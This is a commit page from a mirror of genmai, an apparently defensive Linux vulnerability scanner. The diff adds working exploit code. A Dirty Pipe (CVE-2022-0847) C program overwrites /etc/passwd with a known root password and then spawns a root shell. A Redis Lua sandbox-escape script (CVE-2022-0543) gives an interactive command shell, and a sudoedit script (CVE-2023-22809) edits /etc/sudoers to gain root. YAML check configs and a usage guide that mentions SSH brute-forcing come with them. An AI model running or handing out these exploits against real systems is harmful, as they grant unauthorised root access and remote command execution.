openkylin
/
genmai
mirror of https://gitee.com/openkylin/genmai.git
9
0
Fork 0
Code Issues Projects Releases Wiki Activity

Merge branch 'master' of gitee.com:openkylin/genmai into feat_CVE_2022_25636 

Signed-off-by: 刘千歌 <by2139121@buaa.edu.cn>
This commit is contained in:
刘千歌 2023-03-09 07:26:09 +00:00 committed by Gitee
parent c1afc5f97e 1586ae0bcf
commit d631ceeb72
13 changed files with 426 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/KernelPocs/CVE-2022-0847/CVE-2022-0847 Normal file
View File

Binary file not shown.

179
data/KernelPocs/CVE-2022-0847/CVE-2022-0847.c Normal file
View File

@ -0,0 +1,179 @@
/* SPDX-License-Identifier: GPL-2.0 */
/*
* Copyright 2022 CM4all GmbH / IONOS SE
*
* author: Max Kellermann <max.kellermann@ionos.com>
*
* Proof-of-concept exploit for the Dirty Pipe
* vulnerability (CVE-2022-0847) caused by an uninitialized
* "pipe_buffer.flags" variable. It demonstrates how to overwrite any
* file contents in the page cache, even if the file is not permitted
* to be written, immutable or on a read-only mount.
*
* This exploit requires Linux 5.8 or later; the code path was made
* reachable by commit f6dd975583bd ("pipe: merge
* anon_pipe_buf*_ops"). The commit did not introduce the bug, it was
* there before, it just provided an easy way to exploit it.
*
* There are two major limitations of this exploit: the offset cannot
* be on a page boundary (it needs to write one byte before the offset
* to add a reference to this page to the pipe), and the write cannot
* cross a page boundary.
*
* Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
*
* Further explanation: https://dirtypipe.cm4all.com/
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
/**
* Create a pipe where all "bufs" on the pipe_inode_info ring have the
* PIPE_BUF_FLAG_CAN_MERGE flag set.
*/
static void prepare_pipe(int p[2])
{
if (pipe(p)) abort();
const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
static char buffer[4096];
/* fill the pipe completely; each pipe_buffer will now have
the PIPE_BUF_FLAG_CAN_MERGE flag */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
write(p[1], buffer, n);
r -= n;
}
/* drain the pipe, freeing all pipe_buffer instances (but
leaving the flags initialized) */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
read(p[0], buffer, n);
r -= n;
}
/* the pipe is now empty, and if somebody adds a new
pipe_buffer without initializing its "flags", the buffer
will be mergeable */
}
int main() {
const char *const path = "/etc/passwd";
printf("Backing up /etc/passwd to /tmp/passwd.bak ...\n");
FILE *f1 = fopen("/etc/passwd", "r");
FILE *f2 = fopen("/tmp/passwd.bak", "w");
if (f1 == NULL) {
printf("Failed to open /etc/passwd\n");
exit(EXIT_FAILURE);
} else if (f2 == NULL) {
printf("Failed to open /tmp/passwd.bak\n");
fclose(f1);
exit(EXIT_FAILURE);
}
char c;
while ((c = fgetc(f1)) != EOF)
fputc(c, f2);
fclose(f1);
fclose(f2);
loff_t offset = 4; // after the "root"
const char *const data = ":$1$antx-soc$pIwpJwMMcozsUxAtRa85w.:0:0:test:/root:/bin/sh\n"; // openssl passwd -1 -salt antx-soc antx-soc
printf("Setting root password to \"antx-soc\"...\n");
const size_t data_size = strlen(data);
if (offset % PAGE_SIZE == 0) {
fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
return EXIT_FAILURE;
}
const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
const loff_t end_offset = offset + (loff_t)data_size;
if (end_offset > next_page) {
fprintf(stderr, "Sorry, cannot write across a page boundary\n");
return EXIT_FAILURE;
}
/* open the input file and validate the specified offset */
const int fd = open(path, O_RDONLY); // yes, read-only! :-)
if (fd < 0) {
perror("open failed");
return EXIT_FAILURE;
}
struct stat st;
if (fstat(fd, &st)) {
perror("stat failed");
return EXIT_FAILURE;
}
if (offset > st.st_size) {
fprintf(stderr, "Offset is not inside the file\n");
return EXIT_FAILURE;
}
if (end_offset > st.st_size) {
fprintf(stderr, "Sorry, cannot enlarge the file\n");
return EXIT_FAILURE;
}
/* create the pipe with all flags initialized with
PIPE_BUF_FLAG_CAN_MERGE */
int p[2];
prepare_pipe(p);
/* splice one byte from before the specified offset into the
pipe; this will add a reference to the page cache, but
since copy_page_to_iter_pipe() does not initialize the
"flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
--offset;
ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
if (nbytes < 0) {
perror("splice failed");
return EXIT_FAILURE;
}
if (nbytes == 0) {
fprintf(stderr, "short splice\n");
return EXIT_FAILURE;
}
/* the following write will not create a new pipe_buffer, but
will instead write into the page cache, because of the
PIPE_BUF_FLAG_CAN_MERGE flag */
nbytes = write(p[1], data, data_size);
if (nbytes < 0) {
perror("write failed");
return EXIT_FAILURE;
}
if ((size_t)nbytes < data_size) {
fprintf(stderr, "short write\n");
return EXIT_FAILURE;
}
char *argv[] = {"/bin/sh", "-c", "(echo antx-soc; cat) | su - -c \""
"echo \\\"Restoring /etc/passwd from /tmp/passwd.bak...\\\";"
"cp /tmp/passwd.bak /etc/passwd;"
"echo \\\"Done! Popping shell... (run commands now)\\\";"
"/bin/sh;"
"\" root"};
execv("/bin/sh", argv);
printf("system() function call seems to have failed :(\n");
return EXIT_SUCCESS;
}

38
data/KernelPocs/CVE-2022-0847/CVE-2022-0847.yaml Normal file
View File

@ -0,0 +1,38 @@
FormatVer: 20230308
Id: CVE-2022-0847
Belong: kernel
PocHazardLevel: high
Source: https://github.com/antx-code/CVE-2022-0847
SiteInfo:
Name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核
Severity: high
Description:
DirtyPipe是自 内核版本5.8 以来 Linux 内核中的一个漏洞,允许覆盖任意只读文件中的数据。这会导致特权提升,因为非特权进程可以将代码注入根进程。
ScopeOfInfluence:
Linux kernel < 5.17-rc6.
References:
- https://nvd.nist.gov/vuln/detail/cve-2022-0847
- https://packetstormsecurity.com/files/166229/Dirty-Pipe-Linux-Privilege-Escalation.html
SiteClassification:
CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CvssScore: 7.8
CveId: CVE-2022-0847
CweId: CWE-665, CWE-281
CnvdId: None
KveId: None
Tags:
- 权限提升
SiteRequests:
Implement:
ImArray:
- inter:
InterArgs :
Exec : CVE-2022-0847
Args :
ExpireTime: 30
Inter:
- ">.:>>"
- "<<:id\n"
- ">.:\n"
- ">?:uid=0(root)"
Condition: None

1
data/KernelPocs/KernelPocs.yaml
View File

@ -5,3 +5,4 @@ ExplorerItems:
- ConfigFile: CVE-2022-2588/CVE-2022-2588.yaml
- ConfigFile: CVE-2022-2639/CVE-2022-2639.yaml
- ConfigFile: CVE-2022-25636/CVE-2022-25636.yaml
- ConfigFile: CVE-2022-0847/CVE-2022-0847.yaml

2
data/SystemPocs/CVE-2021-3156/CVE-2021-3156.yaml
View File

@ -4,7 +4,7 @@ Belong: system
PocHazardLevel: low
Source: https://github.com/worawit/CVE-2021-3156
SiteInfo:
Name: PolkitPolicyKit是类Unix系统中一个应用程序级别的工具集通过定义和审核权限规则实现不同优先级进程间的通讯。pkexec是Polkit开源应用框架的一部分可以使授权非特权用户根据定义的策略以特权用户的身份执行命令
Name: Sudo 是一个用于类 Unix 计算机操作系统的程序它能够使用户能够以另一个用户默认是超级用户的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件
Severity: high
Description:
Sudo before 1.9.5p2 存在缓冲区错误漏洞攻击者可使用sudoedit -s和一个以单个反斜杠字符结束的命令行参数升级到root。

0
data/SystemPocs/CVE-2021-4043/CVE-2021-4034.py → data/SystemPocs/CVE-2021-4034/CVE-2021-4034.py
View File

0
data/SystemPocs/CVE-2021-4043/CVE-2021-4043.yaml → data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml
View File

30
data/SystemPocs/CVE-2022-0543/CVE-2022-0543.py Normal file
View File

@ -0,0 +1,30 @@
import redis
import sys
def echoMessage():
version = """
[#] Create By ::
_ _ ___ __ ____
/ \ _ __ __ _ ___| | / _ \ / _| | _ \ ___ _ __ ___ ___ _ __
/ _ \ | '_ \ / _` |/ _ \ | | | | | |_ | | | |/ _ \ '_ ` _ \ / _ \| '_ \
/ ___ \| | | | (_| | __/ | | |_| | _| | |_| | __/ | | | | | (_) | | | |
/_/ \_\_| |_|\__, |\___|_| \___/|_| |____/ \___|_| |_| |_|\___/|_| |_|
|___/ By https://aodsec.com
"""
print(version)
def shell(ip,port,cmd):
lua= 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("'+cmd+'", "r"); local res = f:read("*a"); f:close(); return res'
r = redis.Redis(host = ip,port = port)
script = r.eval(lua,0)
print(script)
if __name__ == '__main__':
echoMessage()
ip = "127.0.0.1"
port = "6379"
while True:
cmd = input("input exec cmd:(q->exit)\n>>")
if cmd == "q" or cmd == "exit":
sys.exit()
shell(ip,port,cmd)

53
data/SystemPocs/CVE-2022-0543/CVE-2022-0543.yaml Normal file
View File

@ -0,0 +1,53 @@
FormatVer: 20230306
Id: CVE-2022-0543
Belong: system
PocHazardLevel: low
Source: https://github.com/aodsec/CVE-2022-0543
SiteInfo:
Name: Redis是著名的开源Key-Value数据库其具备在沙箱中执行Lua脚本的能力。
Severity: critical
Description:
Debian 以及 Ubuntu 发行版的源在打包 Redis 时,不慎在 Lua 沙箱中遗留了一个对象package攻击者可以利用这个对象提供的方法加载动态链接库 liblua 里的函数,进而逃逸沙箱执行任意命令。我们借助 Lua 沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在 Lua 中执行这个导出函数即可获得io库再使用其执行命令。
ScopeOfInfluence:
2.2 <= redis < 5.0.13
2.2 <= redis < 6.0.15
2.2 <= redis < 6.2.5
References:
- http://packetstormsecurity.com/files/166885/Redis-Lua-Sandbox-Escape.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-0543
SiteClassification:
CvssMetrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CvssScore: 10.0
CveId: CVE-2022-0543
CweId: None
CnvdId: None
KveId: None
Tags:
- cve2022
- redis
- RCE
SiteRequests:
Implement:
ImArray:
- Inter : python3
InterArgs :
Exec : CVE-2022-0543.py
Args :
ExpireTime: #second
# < input
# > output
# . wait
# ? condition
# : content
#
#组合起来
# >. 等待直到输出
# << 输入字符
# >?判断条件
Inter:
- ">.:>>" #ture
- "<<:whoami\n"
- ">.:\n" #等待输出'\n'
- ">?:root"
Condition: None

41
data/SystemPocs/CVE-2023-22809/CVE-2023-22809.sh Normal file
View File

@ -0,0 +1,41 @@
#!/usr/bin/env bash
#
# Exploit Title: sudo 1.8.0 - 1.9.12p1 - Privilege Escalation
#
# Exploit Author: n3m1.sys
# CVE: CVE-2023-22809
# Date: 2023/01/21
# Vendor Homepage: https://www.sudo.ws/
# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz
# Version: 1.8.0 to 1.9.12p1
# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9
#
# Running this exploit on a vulnerable system allows a localiattacker to gain
# a root shell on the machine.
#
# The exploit checks if the current user has privileges to run sudoedit or
# sudo -e on a file as root. If so it will open the sudoers file for the
# attacker to add a line to gain privileges on all the files and get a root
# shell.
if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
then
echo "> Currently installed sudo version is not vulnerable"
exit 1
fi
EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)
if [ -z "$EXPLOITABLE" ]; then
echo "> It doesn't seem that this user can run sudoedit as root"
read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
else
echo "> BINGO! User exploitable"
fi
echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
echo "$USER ALL=(ALL:ALL) ALL"
read -n 1 -s -r -p "Press any key to continue..."
EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
sudo su root
exit 0

47
data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml Normal file
View File

@ -0,0 +1,47 @@
FormatVer: 20230308
Id: CVE-2023-22809
Belong: system
PocHazardLevel: low
Source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc
SiteInfo:
Name: Sudo 是一个用于类 Unix 计算机操作系统的程序它能够使用户能够以另一个用户默认是超级用户的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。
Severity: high
Description:
Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。
ScopeOfInfluence:
sudo@[1.8.0, 1.9.12p2)
References:
- https://nvd.nist.gov/vuln/detail/CVE-2023-22809
SiteClassification:
CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CvssScore: 7.8
CveId: CVE-2023-22809
CweId: CWE-269
CnvdId: None
KveId: None
Tags:
- 特权管理不当
SiteRequests:
Implement:
ImArray:
- Inter : bash
InterArgs :
Exec : CVE-2023-22809.sh
Args :
ExpireTime: #second
# < input
# > output
# . wait
# ? condition
# : content
#
#组合起来
# >. 等待直到输出
# << 输入字符
# >?判断条件
Inter:
- "<<:whoami\n" #ture
- ">.:\n"
- ">?:root"
Condition: None

6
data/SystemPocs/SystemPocs.yaml
View File

@ -9,6 +9,8 @@ ExplorerItems:
- ConfigFile: CVE-2022-1292/CVE-2022-1292.yaml
- ConfigFile: CVE-2021-44142/CVE-2021-44142.yaml
- ConfigFile: CVE-2021-3560/CVE-2021-3560.yaml
- ConfigFile: CVE-2021-4043/CVE-2021-4043.yaml
- ConfigFile: CVE-2021-4034/CVE-2021-4034.yaml
- ConfigFile: CVE-2021-3156/CVE-2021-3156.yaml
- ConfigFile: CVE-2022-0351/CVE-2022-0351.yaml
- ConfigFile: CVE-2022-0351/CVE-2022-0351.yaml
- ConfigFile: CVE-2023-22809/CVE-2023-22809.yaml
- ConfigFile: CVE-2022-0543/CVE-2022-0543.yaml

32
docs/使用文档.md Normal file
View File

@ -0,0 +1,32 @@
genmai工具使用文档
一. 环境搭建:
- golang环境大于等于go1.17.2
- python3环境大于等于3.8;
- 进入src目录下终端导入golang需要引入的库这里使用 ”go mod tidy” 进行导入库;
- 进入src目录使用pip3进行导入需要的python库这里使用 “pip3 install -r requirements.txt”,若加载过慢可使用清华源加载pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple ;
二. Kernel模块
- kernel模块为genmai中内核漏洞检测模块。在环境搭建好后使用 ”go run main.go -kernel=all”就可以使用poc/exp检测内核模块是否存在漏洞。因为内核漏洞会引起系统崩溃所以这里我们默认poc/exp为低破坏性的具有破坏性通过匹配内核版本需人工手动执行exp。
- 我们也可以通过配置KernelPocs.yaml或KernelPocs.json文件来选择要执行哪些poc当然我们这默认选择是yaml文件。
三. System模块
- system模块为genami中系统漏洞检测模块其检测通过去调度SystemPocs目录下的poc检测包括sudo提权、polkit提权、openssl等相关漏洞。
- 这里使用 ”go run main.go -system=all”开始系统检测。
- 我们也可以通过配置SystemPocs.yaml或SystemPocs.json文件来选择要执行哪些poc当然我们这默认选择是yaml文件。
四. Baseline模块
- BaseLine模块介绍及使用
- baseline模块为genmai工具的基线检测模块基线检查功能通过配置不同的基线检查策略可以帮助您快速对服务器进行批量扫描发现包括系统、账号权限、数据库、弱口令 、等级保护合规配置等存在的风险点。我们使用 ”go run main.go -baseline=all”开始进行基线检测。
- 可以看出部分基线检测是需要高权限才能检测这时我们可以配置data/BaseLine下的BaseLine.yaml文件中的RootPasswd将root密码对应填入。接着 ”systemctl start ssh” 开启ssh。再次执行基线检测命令。
五. 插件模块
1. FastScan(系统漏洞版本匹配,快速扫描)
> FastScan是通过匹配版本号的方式对系统进行快速扫描。这里我们使用了内部数据库暂时还未准备将数据库公开。所以在扫描前需要输入数据库密码。配置完成后我们使用 ”go run main.go -FastScan”就可以开始对系统进行快速扫描。
2. Fofa(fofa获取资产信息)
3. Nmap(Nmap检测端口开放情况)
4. SSHExplosion(ssh快速爆破检测弱密码情况)
5. WeakPwdGeneration(弱密码生成器)
POC/EXP/基线策略添加